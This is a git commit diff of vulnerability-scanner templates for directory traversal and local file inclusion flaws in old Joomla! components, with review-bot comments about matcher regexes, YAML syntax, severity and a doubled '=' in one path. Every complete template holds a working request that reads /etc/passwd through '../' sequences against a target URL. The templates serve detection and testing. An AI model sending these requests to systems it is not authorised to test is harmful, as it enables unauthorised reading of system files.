Update 8.4.9
parent c6dbad9e02
commit 2937fc272b
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2008-4668
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/6618
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||||
|
tags: cve,cve2008,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
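Review bot: the regex matcher `root:.*:0:0` has no trailing colon and uses a greedy `.*`, so it is looser than the passwd field layout it is meant to recognise. Anchoring it to the fields, for example `root:[^:]*:0:0:`, makes the match depend on the uid and gid columns being complete. The same matcher string is repeated in the other new templates in this commit, so the change applies to each of them.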
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/5435
|
- https://www.exploit-db.com/exploits/5435
|
||||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||||
tags: cve,cve2008,joomla,lfi
|
tags: cve,cve2008,joomla,lfi
|
||||||
|
|
|
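Review bot: a template validation or YAML lint step in CI would have caught the stray `|` on the `reference:` line before it was merged. With the block-scalar indicator in place, the two `- https://...` entries are read as one multi-line string rather than a list. The same one-character fix recurs in the CVE-2009-5114 and CVE-2010-0944 hunks of this commit, which suggests the slip came from a shared template.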
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2008-6172
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/6817
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||||
|
tags: cve,cve2008,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
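Review bot: the preconditions for this check are not surfaced to whoever reads the result. The request path ends in `%00`, and the description limits the issue to hosts where magic_quotes_gpc is disabled, so a non-match does not show that an installed RWCards 3.0.11 is unaffected. State that limitation in the description, or add a matcher that identifies the component itself, so a negative result is not read as a clean one.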
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/36994
|
- https://www.exploit-db.com/exploits/36994
|
||||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||||
tags: cve,cve2009,lfi
|
tags: cve,cve2009,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-0943
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11090
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: high
|
severity: high
|
||||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
reference: |
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/11088
|
- https://www.exploit-db.com/exploits/11088
|
||||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||||
tags: cve,cve2010,joomla,lfi
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-0985
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/10948
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
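Review bot: `severity: high` is the same value given to the read-only traversal templates in this commit, but this description says the flaw allows attackers to "include and execute arbitrary local files". Either raise the severity to reflect that, or note in the description that the matchers only confirm a file read, so the finding is not under-ranked in triage.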
@ -0,0 +1,26 @@
|
||||||
|
id: CVE-2010-1219
|
||||||
|
info:
|
||||||
|
name: Joomla! Component com_janews - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11757
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1304
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component User Status - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/11998
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1305
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12065
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1306
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12058
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1314
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12086
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1345
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/15453
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1345
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1353
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component LoginBox - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12068
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1353
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1354
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12102
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1354
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1471
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12170
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1471
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1474
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12182
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1474
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1475
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12147
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1475
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
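Review bot: the entry under `path:` has a doubled equals sign, `controller==../`, where every other controller-based template in this commit uses `controller=../`. The extra `=` becomes the first character of the parameter value, so the request no longer tests what the description states and the check is likely to report affected hosts as clean. Drop the second `=`.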
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1494
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12113
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1494
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1495
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Matamko 1.01 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12286
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1495
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1532
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12118
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1532
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1533
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12142
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1533
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1535
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12151
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1535
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1601
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component JA Comment - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12236
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1601
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1602
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12283
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1602
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1657
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12428
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1657
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1659
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12426
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1659
|
||||||
|
